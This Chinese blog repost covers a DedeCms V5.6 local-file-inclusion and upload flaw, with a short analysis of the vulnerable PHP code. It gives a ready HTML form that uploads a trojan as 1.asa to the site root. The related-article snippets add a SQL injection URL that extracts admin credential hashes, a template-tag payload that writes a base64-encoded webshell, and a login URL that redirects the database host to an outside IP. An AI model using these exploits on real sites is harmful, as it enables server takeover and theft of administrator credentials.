DedeCms V5.6 本地包含里的上传漏洞(可是那包含漏洞已经公布)

最新推荐文章于 2023-02-07 11:13:45 发布
最新推荐文章于 2023-02-07 11:13:45 发布
阅读量437 收藏
点赞数
文章标签: php python
原文链接:https://my.oschina.net/mickelfeng/blog/662125
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

DedeCmsV5.6 本地包含 
DedeCmsV5.6 本地包含 
http://t00ls.net/thread-8608-1-1.html 


之前就发现了这本地包含的利用方法。  
<form action="http://localhost:8090/plus/carbuyaction.php?dopost=return&action=xxx&code=../../include/dialog/select_soft_post" method="post" enctype="multipart/form-data" name="QuickSearch" id="QuickSearch"> 
<input type="hidden" name="newname" value="1.asa"> 
<input type="file" name="uploadfile"> 
<input type="submit" value="搜索" name="QuickSearchBtn"> 
</form>
上传一个图片木马(只改后辍名为图片类型就行),即可在网站根目录生成 1.asa 文件 


简单分析: 
文件:select_soft_post.php  
<?php 
if(!isset($cfg_basedir)) 
{ 
include_once(dirname(__FILE__).'/config.php'); 
} 
//config.php 是用于验证是否管理员。由于本地包含, $cfg_basedir 已经设置了值,应该跳过了验证。 


//文件名(前为手工指定, 后者自动处理) 
if(!empty($newname)) 
{ 
$filename = $newname; 
if(!ereg("\.", $filename)) $fs = explode('.', $uploadfile_name); 
else $fs = explode('.', $filename); 
if(eregi($cfg_not_allowall, $fs[count($fs)-1])) 
{ 
ShowMsg("你指定的文件名被系统禁止!",'javascript:;'); 
exit(); 
} 
if(!ereg("\.", $filename)) $filename = $filename.'.'.$fs[count($fs)-1]; 
}else{ 
$filename = $cuserLogin->getUserID().'-'.dd2char(MyDate('ymdHis',$nowtme)); 
$fs = explode('.', $uploadfile_name); 
if(eregi($cfg_not_allowall, $fs[count($fs)-1])) 
{ 
ShowMsg("你上传了某些可能存在不安全因素的文件,系统拒绝操作!",'javascript:;'); 
exit(); 
} 
$filename = $filename.'.'.$fs[count($fs)-1]; 
}
问题就出在 $newname 那里,没验证上传类型,但验证了非可上传类型 


//这里强制限定的某些文件类型禁止上传 
$cfg_not_allowall = "php|pl|cgi|asp|aspx|jsp|php3|shtm|shtml|zip|rar|7z|txt"; 

即可以上传非上面类型的文件,有时也并不鸡肋。。

转载于:https://my.oschina.net/mickelfeng/blog/662125

??yy
关注
DEDECMS v5.6漏洞复现
_Ralph的博客
01-16 8026
织梦内容管理系统(dedecms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类cms系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和进步,DedeCms免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。 闲来无事,复现一下dedecms v5.6版
DedeCms V5.6 parse_str函数引起的sql注入漏洞
今天也要加油鸭
04-13 1218
这个是去年跟着红日代码审计复现的织梦cms有parse_str()函数引起的漏洞,特来记录一下。 一、下载 下载地址:http://www.dedecms/upimg/soft/2010/DedeCmsV5.6-UTF8-Final.tar.gz 二、安装 ...
dedecms批量漏洞扫描.zip_dedecms_dedecms 扫描器_dedecms漏洞_dedecms路径扫描_批量扫描
07-13
dedecms批量漏洞扫描,大家可以自己试试效果
dedecms织梦 v5.6 两处跨站漏洞
weixin_33928137的博客
03-21 190
漏洞版本: dedecms织梦 v5.6 漏洞描述: DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。高效率标签缓存机制:允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在...
Dedecms <= V5.6 Final模板执行漏洞
weixin_33979745的博客
03-21 196
漏洞版本: Dedecms V5.6 Final 漏洞描述: Dedecms V5.6 Final版本中的各个文件存在一系列问题,经过精心构造的含有恶意代表的模板内容可以通过用户后台的上传附件的功能上传上去,然后通过SQL注入修改附加表的模板路径为我们上传的模板路径,模板解析类:include/inc_archives_view.php没有对模板路径及名称做任何限制,则可以成功执...
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
weixin_34090643的博客
03-21 1136
漏洞版本: DedeCmsV5.6 漏洞描述: DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。 1 &lt;?php 02 require_once (dirname(__FILE__) . "/../include/comm...
商业源码-编程源码-DedeCms v5.6 GBK build 20100928.zip
06-15
这个版本是DedeCmsv5.6 GBK build 20100928,发布于2010年9月28日,采用GBK编码,主要面向中文用户。DedeCms在当时是一款广泛使用的网站建站系统,特别适合中小企业和个人站长搭建信息类、新闻类网站。 1. **系统...
PHP驱动的DedeCMS V5.6稳定版发布
V5.6版本的DedeCMS可能会包含新的功能和改进,例如增强的用户界面、新的模板标签、更强大的插件系统、优化的数据库查询效率等。这些特性能够帮助网站管理员更加高效地管理网站内容。 - **性能优化** 此版本还...
DeDeCMS v5.7 SP2 正式版 前台任意用户密码修改漏洞复现
m0_60466340的博客
11-28 722
漏洞概述 1.漏洞简介 织梦内容管理系统(DedeCms),以简单、实用、开源而闻名,是国内 最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统, 在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长 足的发展和进步,DedeCms 免费版的主要目标用户锁定在个人站长,功能 更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在 使用该系统。 2018 年 1 月 10 日, 锦行信息安全公众号公开了一个关...
DedeCms v5.6 嵌入恶意代码执行漏洞
Yatere的天平秤
04-25 1241
上传软件的地方,对本地地址没有进行有效的验证,可以被恶意利用注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name/="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行a{/dede:link}{dede:toby57 name/="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz
dede5.6-7漏洞修复文件utf8文件(附加漏洞说明)
08-10
压缩包包括漏洞修复文件,直接覆盖dede默认目录即可,另包含漏洞修复说明及其附加说明。不用手动修复那些难找的文件了,阿云也不会天天发出警报了。
php越权访问漏洞,织梦(DedeCms) v5.6-5.7 越权访问漏洞
weixin_29220405的博客
03-24 665
http://www.XXXX.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS]...
织梦v5.6版本漏洞
weixin_61842894的博客
02-07 412
织梦v5.6版本漏洞
【原】织梦dedecms v5.6 discuz7.2 xss漏洞
步满生错的专栏
09-28 2596
2010年07月05日 星期一 23:31 由于某度众所周知的举动,让我搬离写了5年的渣度空间,准备把技术性的文章定在CSDN了。这些都是文章备份。勿怪。。 鉴于最近有些抓取机器和抄袭者,把标题的【原】字都复制,我不得不声明:本文为 yukon12345原创,转载请注明出
DedeCMS V5.6系统文件目录结构图解
书写人生
12-03 673
DedeCMS V5.6系统文件目录结构图解 |a   /* 生成HTML的目录,老版本为html文件夹   */ |data    /* 程序生成常用数据保存目录   */ |    |admin /* 保存系统后台常规配置,如作者、快速导航、来源这些内容,常以文本格式存放   */ |    |backupdata /* 数据库备份存放目录,可以在系统后台设置处修改   */ |
php 5.6.15漏洞,DEDECMS 5.6最新Get Shell漏洞 DEDECMS 5.3/5.6
weixin_39636333的博客
03-11 213
DEDECMS 5.6最新Get Shell漏洞影响版本:  DEDECMS 5.3/5.6漏洞描述:DedeCms 基于PHP+MySQL的技术开发,支持Windows、Linux、Unix等多种服务器平台,从2004年开始发布第一个版本开始,至今已经发布了五个大版本。DedeCms以简单、健壮、灵活、开源几大特点占领了国内CMS的大部份市场,目前已经有超过二十万个站点正在使用DedeCms或居...
漏洞复现DeDeCMS织梦
qq_53188113的博客
11-25 3144
目录 一、复现环境 二、复现过程及环境 一、复现环境 PHP 5.6 DeDeCMSV5.7SP2 正式版(2018-01-09) 二、复现过程及环境 安装 DeDeCMS 首先,利用PHPstudy安装环境 点击网站,进入后再点击创建网站,然后填写域名,可根据自己的需要来填写 回到文件夹,打开 DeDeCMS所在文件夹的uploads路径,把其下所有的文件复制到 studypro文件夹的www目录中即可 域名/install/ 进入安装页面 填写好..
DedeCMS漏洞文件之carbuyaction.php
xvrywgb的专栏
01-13 2555
DedeCMS漏洞文件之carbuyaction.php dedecms教程 DedeCMS漏洞文件之carbuyaction.php,这个漏洞长达几年,跨了几个版本,网上也公开过了,DedeCMS就是不修复,可以直接导致拿shell 详细说明:漏洞文件carbuyaction.php 本地试了一下,最新DedeCMS版本一样可行。 首先利用cookie修
dedecms 漏洞汇总
热门推荐
积木网络
02-29 1万+
Dedecms 5.6 rss注入漏洞   http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2)) AND "'" AND updatexml(1,(SELECT CONCAT(0x5b,uname,0x3a,MID(pwd,4,16),0x5d) FROM dede_admin),1)#'][0]=1 DedeCms v5.6 嵌入
dedecms v5.6修改登录文件
最新发布
12-26
dedecms v5.6是一个非常流行的开源内容管理系统,它提供了强大的定制和修改功能,包括登录文件的修改。要修改登录文件,首先需要登录dedecms v5.6的后台管理系统,然后找到登录文件的位置。 登录文件通常位于系统的根目录下的`/member`文件夹中,文件名为`login.php`。可以使用文本编辑工具打开这个文件,然后进行相应的修改。 需要注意的是,在修改登录文件时,应该特别留意代码的逻辑和结构,以避免对系统造成不良影响。如果不确定如何修改,建议查阅dedecms v5.6的官方文档或者请有经验的开发人员协助操作。 修改登录文件的内容可以包括但不限于:增加自定义的登录验证逻辑,修改登录成功后的跳转页面,美化登录界面的样式和布局等等。这些修改都可以根据站点的实际需求来进行,以增强用户体验和系统的安全性。 值得一提的是,修改登录文件之前一定要做好备份工作,以免出现意外情况导致系统无法正常运行。完成修改后,建议进行测试和验证,确保修改生效且不会影响系统的正常运行。 总之,dedecms v5.6提供了灵活且强大的定制功能,通过适当修改登录文件,可以实现更加个性化和安全的登录系统。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值